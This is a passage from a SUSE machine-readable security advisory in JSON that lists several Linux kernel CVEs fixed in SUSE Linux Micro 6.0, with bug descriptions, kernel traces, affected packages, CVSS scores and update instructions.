"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54094"
},
{
"cve": "CVE-2023-54095",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54095"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/iommu: Fix notifiers being shared by PCI and VIO buses\n\nfail_iommu_setup() registers the fail_iommu_bus_notifier struct to both\nPCI and VIO buses. struct notifier_block is a linked list node, so this\ncauses any notifiers later registered to either bus type to also be\nregistered to the other since they share the same node.\n\nThis causes issues in (at least) the vgaarb code, which registers a\nnotifier for PCI buses. pci_notify() ends up being called on a vio\ndevice, converted with to_pci_dev() even though it\u0027s not a PCI device,\nand finally makes a bad access in vga_arbiter_add_pci_device() as\ndiscovered with KASAN:\n\n BUG: KASAN: slab-out-of-bounds in vga_arbiter_add_pci_device+0x60/0xe00\n Read of size 4 at addr c000000264c26fdc by task swapper/0/1\n\n Call Trace:\n dump_stack_lvl+0x1bc/0x2b8 (unreliable)\n print_report+0x3f4/0xc60\n kasan_report+0x244/0x698\n __asan_load4+0xe8/0x250\n vga_arbiter_add_pci_device+0x60/0xe00\n pci_notify+0x88/0x444\n notifier_call_chain+0x104/0x320\n blocking_notifier_call_chain+0xa0/0x140\n device_add+0xac8/0x1d30\n device_register+0x58/0x80\n vio_register_device_node+0x9ac/0xce0\n vio_bus_scan_register_devices+0xc4/0x13c\n __machine_initcall_pseries_vio_device_init+0x94/0xf0\n do_one_initcall+0x12c/0xaa8\n kernel_init_freeable+0xa48/0xba8\n kernel_init+0x64/0x400\n ret_from_kernel_thread+0x5c/0x64\n\nFix this by creating separate notifier_block structs for each bus type.\n\n[mpe: Add #ifdef to fix CONFIG_IBMVIO=n build]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54095",
"url": "https://www.suse.com/security/cve/CVE-2023-54095"
},
{
"category": "external",
"summary": "SUSE Bug 1256271 for CVE-2023-54095",
"url": "https://bugzilla.suse.com/1256271"
},
{
"category": "external",
"summary": "SUSE Bug 1256272 for CVE-2023-54095",
"url": "https://bugzilla.suse.com/1256272"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54095"
},
{
"cve": "CVE-2023-54096",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54096"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsoundwire: fix enumeration completion\n\nThe soundwire subsystem uses two completion structures that allow\ndrivers to wait for soundwire device to become enumerated on the bus and\ninitialised by their drivers, respectively.\n\nThe code implementing the signalling is currently broken as it does not\nsignal all current and future waiters and also uses the wrong\nreinitialisation function, which can potentially lead to memory\ncorruption if there are still waiters on the queue.\n\nNot signalling future waiters specifically breaks sound card probe\ndeferrals as codec drivers can not tell that the soundwire device is\nalready attached when being reprobed. Some codec runtime PM\nimplementations suffer from similar problems as waiting for enumeration\nduring resume can also timeout despite the device already having been\nenumerated.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54096",
"url": "https://www.suse.com/security/cve/CVE-2023-54096"
},
{
"category": "external",
"summary": "SUSE Bug 1256178 for CVE-2023-54096",
"url": "https://bugzilla.suse.com/1256178"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54096"
},
{
"cve": "CVE-2023-54099",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54099"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs: Protect reconfiguration of sb read-write from racing writes\n\nThe reconfigure / remount code takes a lot of effort to protect\nfilesystem\u0027s reconfiguration code from racing writes on remounting\nread-only. However during remounting read-only filesystem to read-write\nmode userspace writes can start immediately once we clear SB_RDONLY\nflag. This is inconvenient for example for ext4 because we need to do\nsome writes to the filesystem (such as preparation of quota files)\nbefore we can take userspace writes so we are clearing SB_RDONLY flag\nbefore we are fully ready to accept userpace writes and syzbot has found\na way to exploit this [1]. Also as far as I\u0027m reading the code\nthe filesystem remount code was protected from racing writes in the\nlegacy mount path by the mount\u0027s MNT_READONLY flag so this is relatively\nnew problem. It is actually fairly easy to protect remount read-write\nfrom racing writes using sb-\u003es_readonly_remount flag so let\u0027s just do\nthat instead of having to workaround these races in the filesystem code.\n\n[1] https://lore.kernel.org/all/00000000000006a0df05f6667499@google.com/T/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54099",
"url": "https://www.suse.com/security/cve/CVE-2023-54099"
},
{
"category": "external",
"summary": "SUSE Bug 1256197 for CVE-2023-54099",
"url": "https://bugzilla.suse.com/1256197"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54099"
},
{
"cve": "CVE-2023-54101",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54101"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndriver: soc: xilinx: use _safe loop iterator to avoid a use after free\n\nThe hash_for_each_possible() loop dereferences \"eve_data\" to get the\nnext item on the list. However the loop frees eve_data so it leads to\na use after free. Use hash_for_each_possible_safe() instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54101",
"url": "https://www.suse.com/security/cve/CVE-2023-54101"
},
{
"category": "external",
"summary": "SUSE Bug 1256153 for CVE-2023-54101",
"url": "https://bugzilla.suse.com/1256153"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54101"
},
{
"cve": "CVE-2023-54104",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54104"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtd: rawnand: fsl_upm: Fix an off-by one test in fun_exec_op()\n\n\u0027op-cs\u0027 is copied in \u0027fun-\u003emchip_number\u0027 which is used to access the\n\u0027mchip_offsets\u0027 and the \u0027rnb_gpio\u0027 arrays.\nThese arrays have NAND_MAX_CHIPS elements, so the index must be below this\nlimit.\n\nFix the sanity check in order to avoid the NAND_MAX_CHIPS value. This\nwould lead to out-of-bound accesses.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54104",
"url": "https://www.suse.com/security/cve/CVE-2023-54104"
},
{
"category": "external",
"summary": "SUSE Bug 1256145 for CVE-2023-54104",
"url": "https://bugzilla.suse.com/1256145"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54104"
},
{
"cve": "CVE-2023-54106",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54106"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: fix potential memory leak in mlx5e_init_rep_rx\n\nThe memory pointed to by the priv-\u003erx_res pointer is not freed in the error\npath of mlx5e_init_rep_rx, which can lead to a memory leak. Fix by freeing\nthe memory in the error path, thereby making the error path identical to\nmlx5e_cleanup_rep_rx().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54106",
"url": "https://www.suse.com/security/cve/CVE-2023-54106"
},
{
"category": "external",
"summary": "SUSE Bug 1256358 for CVE-2023-54106",
"url": "https://bugzilla.suse.com/1256358"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54106"
},
{
"cve": "CVE-2023-54112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nkcm: Fix memory leak in error path of kcm_sendmsg()\n\nsyzbot reported a memory leak like below:\n\nBUG: memory leak\nunreferenced object 0xffff88810b088c00 (size 240):\n comm \"syz-executor186\", pid 5012, jiffies 4294943306 (age 13.680s)\n hex dump (first 32 bytes):\n 00 89 08 0b 81 88 ff ff 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace:\n [\u003cffffffff83e5d5ff\u003e] __alloc_skb+0x1ef/0x230 net/core/skbuff.c:634\n [\u003cffffffff84606e59\u003e] alloc_skb include/linux/skbuff.h:1289 [inline]\n [\u003cffffffff84606e59\u003e] kcm_sendmsg+0x269/0x1050 net/kcm/kcmsock.c:815\n [\u003cffffffff83e479c6\u003e] sock_sendmsg_nosec net/socket.c:725 [inline]\n [\u003cffffffff83e479c6\u003e] sock_sendmsg+0x56/0xb0 net/socket.c:748\n [\u003cffffffff83e47f55\u003e] ____sys_sendmsg+0x365/0x470 net/socket.c:2494\n [\u003cffffffff83e4c389\u003e] ___sys_sendmsg+0xc9/0x130 net/socket.c:2548\n [\u003cffffffff83e4c536\u003e] __sys_sendmsg+0xa6/0x120 net/socket.c:2577\n [\u003cffffffff84ad7bb8\u003e] do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n [\u003cffffffff84ad7bb8\u003e] do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80\n [\u003cffffffff84c0008b\u003e] entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nIn kcm_sendmsg(), kcm_tx_msg(head)-\u003elast_skb is used as a cursor to append\nnewly allocated skbs to \u0027head\u0027. If some bytes are copied, an error occurred,\nand jumped to out_error label, \u0027last_skb\u0027 is left unmodified. A later\nkcm_sendmsg() will use an obsoleted \u0027last_skb\u0027 reference, corrupting the\n\u0027head\u0027 frag_list and causing the leak.\n\nThis patch fixes this issue by properly updating the last allocated skb in\n\u0027last_skb\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
